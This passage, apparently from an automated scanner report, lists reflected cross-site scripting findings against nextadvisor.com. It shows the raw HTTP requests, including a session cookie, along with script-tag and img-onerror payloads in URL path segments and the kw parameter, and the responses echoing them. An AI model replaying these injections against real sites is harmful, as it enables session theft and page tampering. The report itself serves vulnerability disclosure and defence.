Confidence:   Certain
Host:   http://www.nextadvisor.com
Path:   /pmid/

Issue detail

The value of REST URL parameter 1 is copied into the value of an HTML tag attribute which is encapsulated in single quotation marks. The payload 9d626'><img%20src%3da%20onerror%3dalert(1)>287be27fca8 was submitted in the REST URL parameter 1. This input was echoed as 9d626'><img src=a onerror=alert(1)>287be27fca8 in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response. The PoC attack demonstrated uses an event handler to introduce arbitrary JavaScript into the document.

Request

GET /pmid9d626'><img%20src%3da%20onerror%3dalert(1)>287be27fca8/?kw=id%2520gid9a%2520identity%2520theft%2520resource_ordering34--2011-04-23--20-10-01CD1 HTTP/1.1
Host: www.nextadvisor.com
Proxy-Connection: keep-alive
Cache-Control: max-age=0
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.16 (KHTML, like Gecko) Chrome/10.0.648.205 Safari/534.16
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: PHPSESSID=ca43057bfb377bbe8c129dafe1c6ec28; __utmz=252293142.1303613812.1.1.utmgclid=CJa0kuyTtKgCFQTe4AodlRiOCw|utmccn=(not%20set)|utmcmd=(not%20set); __utma=252293142.2039271104.1303613812.1303613812.1303613812.1; __utmc=252293142; __utmb=252293142.1.10.1303613812

Response

HTTP/1.1 404 Not Found
Date: Sun, 24 Apr 2011 03:19:00 GMT
Server: Apache/2.2.15 (Unix) mod_ssl/2.2.15 OpenSSL/0.9.7e PHP/5.3.2 mod_jk/1.2.21
X-Powered-By: PHP/5.3.2
Expires: Thu, 19 Nov 1981 08:52:00 GMT
Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0
Pragma: no-cache
P3P: CP="IDC DSP COR CURa ADMa OUR IND PHY ONL COM STA"
Vary: Accept-Encoding
Content-Type: text/html
Content-Length: 11922


<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>


<meta http-equiv="Conten
...[SNIP]...
<a href='/pmid9d626'><img src=a onerror=alert(1)>287be27fca8/index.php' class='nav_select'>
...[SNIP]...

5.66. http://www.nextadvisor.com/pmid/ [kw parameter]

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.nextadvisor.com
Path:   /pmid/

Issue detail

The value of the kw request parameter is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 1f50a"><script>alert(1)</script>44a276d8c09 was submitted in the kw parameter. This input was echoed as 1f50a\"><script>alert(1)</script>44a276d8c09 in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /pmid/?kw=id%2520gid9a%2520identity%2520theft%2520resource_ordering34--2011-04-23--20-10-01CD11f50a"><script>alert(1)</script>44a276d8c09 HTTP/1.1
Host: www.nextadvisor.com
Proxy-Connection: keep-alive
Cache-Control: max-age=0
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.16 (KHTML, like Gecko) Chrome/10.0.648.205 Safari/534.16
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: PHPSESSID=ca43057bfb377bbe8c129dafe1c6ec28; __utmz=252293142.1303613812.1.1.utmgclid=CJa0kuyTtKgCFQTe4AodlRiOCw|utmccn=(not%20set)|utmcmd=(not%20set); __utma=252293142.2039271104.1303613812.1303613812.1303613812.1; __utmc=252293142; __utmb=252293142.1.10.1303613812

Response

HTTP/1.1 200 OK
Date: Sun, 24 Apr 2011 03:14:02 GMT
Server: Apache/2.2.15 (Unix) mod_ssl/2.2.15 OpenSSL/0.9.7e PHP/5.3.2 mod_jk/1.2.21
X-Powered-By: PHP/5.3.2
Expires: Thu, 19 Nov 1981 08:52:00 GMT
Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0
Pragma: no-cache
P3P: CP="IDC DSP COR CURa ADMa OUR IND PHY ONL COM STA"
Vary: Accept-Encoding
Content-Type: text/html
Content-Length: 8853


<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
<meta http-equiv="Content-
...[SNIP]...
<input type="hidden" name="bcd" value="id%20gid9a%20identity%20theft%20resource_ordering34--2011-04-23--20-10-01CD11f50a\"><script>alert(1)</script>44a276d8c09">
...[SNIP]...

5.67. http://www.nextadvisor.com/pmid/js/jquery.js [REST URL parameter 1]

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.nextadvisor.com
Path:   /pmid/js/jquery.js

Issue detail

The value of REST URL parameter 1 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 24a2c"><script>alert(1)</script>911df5ea084 was submitted in the REST URL parameter 1. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /pmid24a2c"><script>alert(1)</script>911df5ea084/js/jquery.js HTTP/1.1
Host: www.nextadvisor.com
Proxy-Connection: keep-alive
Referer: http://www.nextadvisor.com/pmid/?kw=id%2520gid9a%2520identity%2520theft%2520resource_ordering34--2011-04-23--20-10-01CD1
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.16 (KHTML, like Gecko) Chrome/10.0.648.205 Safari/534.16
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: PHPSESSID=ca43057bfb377bbe8c129dafe1c6ec28; __utmz=252293142.1303613812.1.1.utmgclid=CJa0kuyTtKgCFQTe4AodlRiOCw|utmccn=(not%20set)|utmcmd=(not%20set); __utma=252293142.2039271104.1303613812.1303613812.1303613812.1; __utmc=252293142; __utmb=252293142.1.10.1303613812

Response

HTTP/1.1 404 Not Found
Date: Sun, 24 Apr 2011 03:33:50 GMT
Server: Apache/2.2.15 (Unix) mod_ssl/2.2.15 OpenSSL/0.9.7e PHP/5.3.2 mod_jk/1.2.21
X-Powered-By: PHP/5.3.2
Expires: Thu, 19 Nov 1981 08:52:00 GMT
Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0
Pragma: no-cache
P3P: CP="IDC DSP COR CURa ADMa OUR IND PHY ONL COM STA"
Vary: Accept-Encoding
Content-Type: text/html
Content-Length: 11883


<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>


<meta http-equiv="Conten
...[SNIP]...
<link rel="canonical" href="http://www.nextadvisor.com/pmid24a2c"><script>alert(1)</script>911df5ea084/js/jquery.js" />
...[SNIP]...

5.68. http://www.nextadvisor.com/pmid/js/jquery.js [REST URL parameter 2]

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.nextadvisor.com
Path:   /pmid/js/jquery.js

Issue detail

The value of REST URL parameter 2 is copied into the value of an HTML tag attribute which is encapsulated in single quotation marks. The payload f8df7'><img%20src%3da%20onerror%3dalert(1)>6cd5eb81ae0 was submitted in the REST URL parameter 2. This input was echoed as f8df7'><img src=a onerror=alert(1)>6cd5eb81ae0 in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response. The PoC attack demonstrated uses an event handler to introduce arbitrary JavaScript into the document.

Request

GET /pmid/jsf8df7'><img%20src%3da%20onerror%3dalert(1)>6cd5eb81ae0/jquery.js HTTP/1.1
Host: www.nextadvisor.com
Proxy-Connection: keep-alive
Referer: http://www.nextadvisor.com/pmid/?kw=id%2520gid9a%2520identity%2520theft%2520resource_ordering34--2011-04-23--20-10-01CD1
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.16 (KHTML, like Gecko) Chrome/10.0.648.205 Safari/534.16
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: PHPSESSID=ca43057bfb377bbe8c129dafe1c6ec28; __utmz=252293142.1303613812.1.1.utmgclid=CJa0kuyTtKgCFQTe4AodlRiOCw|utmccn=(not%20set)|utmcmd=(not%20set); __utma=252293142.2039271104.1303613812.1303613812.1303613812.1; __utmc=252293142; __utmb=252293142.1.10.1303613812

Response

HTTP/1.1 404 Not Found
Date: Sun, 24 Apr 2011 03:34:45 GMT
Server: Apache/2.2.15 (Unix) mod_ssl/2.2.15 OpenSSL/0.9.7e PHP/5.3.2 mod_jk/1.2.21
X-Powered-By: PHP/5.3.2
Expires: Thu, 19 Nov 1981 08:52:00 GMT
Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0
Pragma: no-cache
P3P: CP="IDC DSP COR CURa ADMa OUR IND PHY ONL COM STA"
Vary: Accept-Encoding
Content-Type: text/html
Content-Length: 11932


<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>


<meta http-equiv="Conten
...[SNIP]...
<a href='/jsf8df7'><img src=a onerror=alert(1)>6cd5eb81ae0/index.php' class='nav_select'>
...[SNIP]...

5.69. http://www.nextadvisor.com/pmid/js/jquery.js [REST URL parameter 2]

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.nextadvisor.com
Path:   /pmid/js/jquery.js

Issue detail

The value of REST URL parameter 2 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload fec85"><script>alert(1)</script>1df6d9d92ab was submitted in the REST URL parameter 2. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /pmid/jsfec85"><script>alert(1)</script>1df6d9d92ab/jquery.js HTTP/1.1
Host: www.nextadvisor.com
Proxy-Connection: keep-alive
Referer: http://www.nextadvisor.com/pmid/?kw=id%2520gid9a%2520identity%2520theft%2520resource_ordering34--2011-04-23--20-10-01CD1
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.16 (KHTML, like Gecko) Chrome/10.0.648.205 Safari/534.16
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: PHPSESSID=ca43057bfb377bbe8c129dafe1c6ec28; __utmz=252293142.1303613812.1.1.utmgclid=CJa0kuyTtKgCFQTe4AodlRiOCw|utmccn=(not%20set)|utmcmd=(not%20set); __utma=252293142.2039271104.1303613812.1303613812.1303613812.1; __utmc=252293142; __utmb=252293142.1.10.1303613812

Response

HTTP/1.1 404 Not Found
Date: Sun, 24 Apr 2011 03:34:33 GMT
Server: Apache/2.2.15 (Unix) mod_ssl/2.2.15 OpenSSL/0.9.7e PHP/5.3.2 mod_jk/1.2.21
X-Powered-By: PHP/5.3.2
Expires: Thu, 19 Nov 1981 08:52:00 GMT
Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0
Pragma: no-cache
P3P: CP="IDC DSP COR CURa ADMa OUR IND PHY ONL COM STA"
Vary: Accept-Encoding
Content-Type: text/html
Content-Length: 11899


<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>


<meta http-equiv="Conten
...[SNIP]...
<link rel="canonical" href="http://www.nextadvisor.com/pmid/jsfec85"><script>alert(1)</script>1df6d9d92ab/jquery.js" />
...[SNIP]...

5.70. http://www.nextadvisor.com/pmid/js/jquery.js [REST URL parameter 3]

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.nextadvisor.com
Path:   /pmid/js/jquery.js

Issue detail

The value of REST URL parameter 3 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload c828a"><script>alert(1)</script>d972e93d2be was submitted in the REST URL parameter 3. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /pmid/js/jquery.jsc828a"><script>alert(1)</script>d972e93d2be HTTP/1.1
Host: www.nextadvisor.com
Proxy-Connection: keep-alive
Referer: http://www.nextadvisor.com/pmid/?kw=id%2520gid9a%2520identity%2520theft%2520resource_ordering34--2011-04-23--20-10-01CD1
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.16 (KHTML, like Gecko) Chrome/10.0.648.205 Safari/534.16
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: PHPSESSID=ca43057bfb377bbe8c129dafe1c6ec28; __utmz=252293142.1303613812.1.1.utmgclid=CJa0kuyTtKgCFQTe4AodlRiOCw|utmccn=(not%20set)|utmcmd=(not%20set); __utma=252293142.2039271104.1303613812.1303613812.1303613812.1; __utmc=252293142; __utmb=252293142.1.10.1303613812

Response

HTTP/1.1 404 Not Found
Date: Sun, 24 Apr 2011 03:35:25 GMT
Server: Apache/2.2.15 (Unix) mod_ssl/2.2.15 OpenSSL/0.9.7e PHP/5.3.2 mod_jk/1.2.21
X-Powered-By: PHP/5.3.2
Expires: Thu, 19 Nov 1981 08:52:00 GMT
Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0
Pragma: no-cache
P3P: CP="IDC DSP COR CURa ADMa OUR IND PHY ONL COM STA"
Vary: Accept-Encoding
Content-Type: text/html
Content-Length: 11914


<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>


<meta http-equiv="Conten
...[SNIP]...
<link rel="canonical" href="http://www.nextadvisor.com/pmid/js/jquery.jsc828a"><script>alert(1)</script>d972e93d2be" />
...[SNIP]...

5.71. http://www.nextadvisor.com/pmid/js/jquery.validate.min.js [REST URL parameter 1]

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.nextadvisor.com
Path:   /pmid/js/jquery.validate.min.js

Issue detail

The value of REST URL parameter 1 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 4e678"><script>alert(1)</script>59725e772e8 was submitted in the REST URL parameter 1. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /pmid4e678"><script>alert(1)</script>59725e772e8/js/jquery.validate.min.js HTTP/1.1
Host: www.nextadvisor.com
Proxy-Connection: keep-alive
Referer: http://www.nextadvisor.com/pmid/?kw=id%2520gid9a%2520identity%2520theft%2520resource_ordering34--2011-04-23--20-10-01CD1
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.16 (KHTML, like Gecko) Chrome/10.0.648.205 Safari/534.16
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: PHPSESSID=ca43057bfb377bbe8c129dafe1c6ec28; __utmz=252293142.1303613812.1.1.utmgclid=CJa0kuyTtKgCFQTe4AodlRiOCw|utmccn=(not%20set)|utmcmd=(not%20set); __utma=252293142.2039271104.1303613812.1303613812.1303613812.1; __utmc=252293142; __utmb=252293142.1.10.1303613812

Response

HTTP/1.1 404 Not Found
Date: Sun, 24 Apr 2011 03:31:07 GMT
Server: Apache/2.2.15 (Unix) mod_ssl/2.2.15 OpenSSL/0.9.7e PHP/5.3.2 mod_jk/1.2.21
X-Powered-By: PHP/5.3.2
Expires: Thu, 19 Nov 1981 08:52:00 GMT
Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0
Pragma: no-cache
P3P: CP="IDC DSP COR CURa ADMa OUR IND PHY ONL COM STA"
Vary: Accept-Encoding
Content-Type: text/html
Content-Length: 11896


<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>


<meta http-equiv="Conten
...[SNIP]...
<link rel="canonical" href="http://www.nextadvisor.com/pmid4e678"><script>alert(1)</script>59725e772e8/js/jquery.validate.min.js" />
...[SNIP]...

5.72. http://www.nextadvisor.com/pmid/js/jquery.validate.min.js [REST URL parameter 2]

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.nextadvisor.com
Path:   /pmid/js/jquery.validate.min.js

Issue detail

The value of REST URL parameter 2 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 612b5"><script>alert(1)</script>5ee41bf8af was submitted in the REST URL parameter 2. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /pmid/js612b5"><script>alert(1)</script>5ee41bf8af/jquery.validate.min.js HTTP/1.1
Host: www.nextadvisor.com
Proxy-Connection: keep-alive
Referer: http://www.nextadvisor.com/pmid/?kw=id%2520gid9a%2520identity%2520theft%2520resource_ordering34--2011-04-23--20-10-01CD1
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.16 (KHTML, like Gecko) Chrome/10.0.648.205 Safari/534.16
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: PHPSESSID=ca43057bfb377bbe8c129dafe1c6ec28; __utmz=252293142.1303613812.1.1.utmgclid=CJa0kuyTtKgCFQTe4AodlRiOCw|utmccn=(not%20set)|utmcmd=(not%20set); __utma=252293142.2039271104.1303613812.1303613812.1303613812.1; __utmc=252293142; __utmb=252293142.1.10.1303613812

Response

HTTP/1.1 404 Not Found
Date: Sun, 24 Apr 2011 03:31:46 GMT
Server: Apache/2.2.15 (Unix) mod_ssl/2.2.15 OpenSSL/0.9.7e PHP/5.3.2 mod_jk/1.2.21
X-Powered-By: PHP/5.3.2
Expires: Thu, 19 Nov 1981 08:52:00 GMT
Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0
Pragma: no-cache
P3P: CP="IDC DSP COR CURa ADMa OUR IND PHY ONL COM STA"
Vary: Accept-Encoding
Content-Type: text/html
Content-Length: 11910


<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>


<meta http-equiv="Conten
...[SNIP]...
<link rel="canonical" href="http://www.nextadvisor.com/pmid/js612b5"><script>alert(1)</script>5ee41bf8af/jquery.validate.min.js" />
...[SNIP]...

5.73. http://www.nextadvisor.com/pmid/js/jquery.validate.min.js [REST URL parameter 2]

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.nextadvisor.com
Path:   /pmid/js/jquery.validate.min.js

Issue detail

The value of REST URL parameter 2 is copied into the value of an HTML tag attribute which is encapsulated in single quotation marks. The payload c856d'><img%20src%3da%20onerror%3dalert(1)>43a6f1cd54f was submitted in the REST URL parameter 2. This input was echoed as c856d'><img src=a onerror=alert(1)>43a6f1cd54f in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response. The PoC attack demonstrated uses an event handler to introduce arbitrary JavaScript into the document.

Request

GET /pmid/jsc856d'><img%20src%3da%20onerror%3dalert(1)>43a6f1cd54f/jquery.validate.min.js HTTP/1.1
Host: www.nextadvisor.com
Proxy-Connection: keep-alive
Referer: http://www.nextadvisor.com/pmid/?kw=id%2520gid9a%2520identity%2520theft%2520resource_ordering34--2011-04-23--20-10-01CD1
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.16 (KHTML, like Gecko) Chrome/10.0.648.205 Safari/534.16
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: PHPSESSID=ca43057bfb377bbe8c129dafe1c6ec28; __utmz=252293142.1303613812.1.1.utmgclid=CJa0kuyTtKgCFQTe4AodlRiOCw|utmccn=(not%20set)|utmcmd=(not%20set); __utma=252293142.2039271104.1303613812.1303613812.1303613812.1; __utmc=252293142; __utmb=252293142.1.10.1303613812

Response

HTTP/1.1 404 Not Found
Date: Sun, 24 Apr 2011 03:31:58 GMT
Server: Apache/2.2.15 (Unix) mod_ssl/2.2.15 OpenSSL/0.9.7e PHP/5.3.2 mod_jk/1.2.21
X-Powered-By: PHP/5.3.2
Expires: Thu, 19 Nov 1981 08:52:00 GMT
Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0
Pragma: no-cache
P3P: CP="IDC DSP COR CURa ADMa OUR IND PHY ONL COM STA"
Vary: Accept-Encoding
Content-Type: text/html
Content-Length: 11945


<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>


<meta http-equiv="Conten
...[SNIP]...
<a href='/jsc856d'><img src=a onerror=alert(1)>43a6f1cd54f/index.php' class='nav_select'>
...[SNIP]...

5.74. http://www.nextadvisor.com/pmid/js/jquery.validate.min.js [REST URL parameter 3]

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.nextadvisor.com
Path:   /pmid/js/jquery.validate.min.js

Issue detail

The value of REST URL parameter 3 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 999eb"><script>alert(1)</script>e7251367e18 was submitted in the REST URL parameter 3. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /pmid/js/jquery.validate.min.js999eb"><script>alert(1)</script>e7251367e18 HTTP/1.1
Host: www.nextadvisor.com
Proxy-Connection: keep-alive
Referer: http://www.nextadvisor.com/pmid/?kw=id%2520gid9a%2520identity%2520theft%2520resource_ordering34--2011-04-23--20-10-01CD1
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.16 (KHTML, like Gecko) Chrome/10.0.648.205 Safari/534.16
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: PHPSESSID=ca43057bfb377bbe8c129dafe1c6ec28; __utmz=252293142.1303613812.1.1.utmgclid=CJa0kuyTtKgCFQTe4AodlRiOCw|utmccn=(not%20set)|utmcmd=(not%20set); __utma=252293142.2039271104.1303613812.1303613812.1303613812.1; __utmc=252293142; __utmb=252293142.1.10.1303613812

Response

HTTP/1.1 404 Not Found
Date: Sun, 24 Apr 2011 03:32:37 GMT
Server: Apache/2.2.15 (Unix) mod_ssl/2.2.15 OpenSSL/0.9.7e PHP/5.3.2 mod_jk/1.2.21
X-Powered-By: PHP/5.3.2
Expires: Thu, 19 Nov 1981 08:52:00 GMT
Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0
Pragma: no-cache
P3P: CP="IDC DSP COR CURa ADMa OUR IND PHY ONL COM STA"
Vary: Accept-Encoding
Content-Type: text/html
Content-Length: 11940


<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>


<meta http-equiv="Conten
...[SNIP]...
<link rel="canonical" href="http://www.nextadvisor.com/pmid/js/jquery.validate.min.js999eb"><script>alert(1)</script>e7251367e18" />
...[SNIP]...

5.75. http://www.nextadvisor.com/pmid/style.css [REST URL parameter 1]

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.nextadvisor.com
Path:   /pmid/style.css

Issue detail

The value of REST URL parameter 1 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 382db"><script>alert(1)</script>73094e0c235 was submitted in the REST URL parameter 1. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /pmid382db"><script>alert(1)</script>73094e0c235/style.css HTTP/1.1
Host: www.nextadvisor.com
Proxy-Connection: keep-alive
Referer: http://www.nextadvisor.com/pmid/?kw=id%2520gid9a%2520identity%2520theft%2520resource_ordering34--2011-04-23--20-10-01CD1
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.16 (KHTML, like Gecko) Chrome/10.0.648.205 Safari/534.16
Accept: text/css,*/*;q=0.1
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: PHPSESSID=ca43057bfb377bbe8c129dafe1c6ec28; __utmz=252293142.1303613812.1.1.utmgclid=CJa0kuyTtKgCFQTe4AodlRiOCw|utmccn=(not%20set)|utmcmd=(not%20set); __utma=252293142.2039271104.1303613812.1303613812.1303613812.1; __utmc=252293142; __utmb=252293142.1.10.1303613812

Response

HTTP/1.1 404 Not Found
Date: Sun, 24 Apr 2011 03:29:57 GMT
Server: Apache/2.2.15 (Unix) mod_ssl/2.2.15 OpenSSL/0.9.7e PHP/5.3.2 mod_jk/1.2.21
X-Powered-By: PHP/5.3.2
Expires: Thu, 19 Nov 1981 08:52:00 GMT
Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0
Pragma: no-cache
P3P: CP="IDC DSP COR CURa ADMa OUR IND PHY ONL COM STA"
Vary: Accept-Encoding
Content-Type: text/html
Content-Length: 11896


<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>


<meta http-equiv="Conten
...[SNIP]...
<link rel="canonical" href="http://www.nextadvisor.com/pmid382db"><script>alert(1)</script>73094e0c235/style.css" />
...[SNIP]...

5.76. http://www.nextadvisor.com/pmid/style.css [REST URL parameter 1]

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.nextadvisor.com
Path:   /pmid/style.css

Issue detail

The value of REST URL parameter 1 is copied into the value of an HTML tag attribute which is encapsulated in single quotation marks. The payload e22eb'><img%20src%3da%20onerror%3dalert(1)>65ff3245d2 was submitted in the REST URL parameter 1. This input was echoed as e22eb'><img src=a onerror=alert(1)>65ff3245d2 in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response. The PoC attack demonstrated uses an event handler to introduce arbitrary JavaScript into the document.

Request

GET /pmide22eb'><img%20src%3da%20onerror%3dalert(1)>65ff3245d2/style.css HTTP/1.1
Host: www.nextadvisor.com
Proxy-Connection: keep-alive
Referer: http://www.nextadvisor.com/pmid/?kw=id%2520gid9a%2520identity%2520theft%2520resource_ordering34--2011-04-23--20-10-01CD1
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.16 (KHTML, like Gecko) Chrome/10.0.648.205 Safari/534.16
Accept: text/css,*/*;q=0.1
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: PHPSESSID=ca43057bfb377bbe8c129dafe1c6ec28; __utmz=252293142.1303613812.1.1.utmgclid=CJa0kuyTtKgCFQTe4AodlRiOCw|utmccn=(not%20set)|utmcmd=(not%20set); __utma=252293142.2039271104.1303613812.1303613812.1303613812.1; __utmc=252293142; __utmb=252293142.1.10.1303613812

Response

HTTP/1.1 404 Not Found
Date: Sun, 24 Apr 2011 03:30:08 GMT
Server: Apache/2.2.15 (Unix) mod_ssl/2.2.15 OpenSSL/0.9.7e PHP/5.3.2 mod_jk/1.2.21
X-Powered-By: PHP/5.3.2
Expires: Thu, 19 Nov 1981 08:52:00 GMT
Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0
Pragma: no-cache
P3P: CP="IDC DSP COR CURa ADMa OUR IND PHY ONL COM STA"
Vary: Accept-Encoding
Content-Type: text/html
Content-Length: 11929


<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>


<meta http-equiv="Conten
...[SNIP]...
<a href='/pmide22eb'><img src=a onerror=alert(1)>65ff3245d2/index.php' class='nav_select'>
...[SNIP]...

5.77. http://www.nextadvisor.com/pmid/style.css [REST URL parameter 2]

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.nextadvisor.com
Path:   /pmid/style.css

Issue detail

